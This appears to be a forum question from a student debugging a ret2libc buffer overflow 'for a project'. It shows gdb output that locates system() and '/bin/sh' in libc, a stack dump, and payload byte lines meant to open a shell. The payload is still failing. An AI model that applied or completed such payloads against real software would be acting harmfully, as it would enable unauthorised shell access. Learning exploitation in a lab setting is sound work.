I am trying to do a buffer overflow for a project. The buffer needs to overflow to /bin/sh. I have found the correct return address, but I do not seem to be successfully getting an overflow.
Program received signal SIGSEGV, Segmentation fault.
0xb7fbc544 in msg (params) at myfile.c:167
167 msg_length = ctx->backend->send_msg_pre(msg, msg_length);
(gdb) backtrace
#0 0xb7fbc544 in msg (params) at myfile.c:167
#1 0xb7fbc869 in my_function(params) at myfile.c:912
#2 0xb7e4c190 in ?? () at ../sysdeps/unix/sysv/linux/system.c:76 from /lib/i386-linux-gnu/libc.so.6
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
To find the /bin/sh I followed this post:
(gdb) print &system
$15 = (<text variable, no debug info> *) 0xb7e4c190 <__libc_system>
(gdb) find &system,+9999999,"/bin/sh"
0xb7f6ca24
warning: Unable to access 16000 bytes of target memory at 0xb7fc292c, halting search.
1 pattern found.
(gdb)
I have found the return address and verified it is correct (if I replace it with a different function, it calls that function). The original return address is bolded:
0xbffff690: 0x90909090 0x90909090 0x90909090 0xb7e4c190
0xbffff6a0: 0xb7f6ca24 0x0804c050 0x0000004d 0x0804c158
The payload I sent was 0xb7e4c190 0xb7f6ca24 50
This overflow is a bit more tricky than others, because I need to do some padding to it in the front and the back. The way the item I am overflowing works is that it sets 6 bytes, so each set will take up a portion of one address and another.
I think the problem is that I have to overflow the last byte. I matched what it was originally, but that does not seem to work:
payload = payload + ['\x90'] + ['\xc1'] + ['\xe4'] + ['\xb7']
payload = payload + ['\x24'] + ['\xca'] + ['\xf6'] + ['\xb7'] + ['\x50']
Is there something I am missing here? Because the stack does not show the /bin/sh call in the overflow, I feel like that is not correct.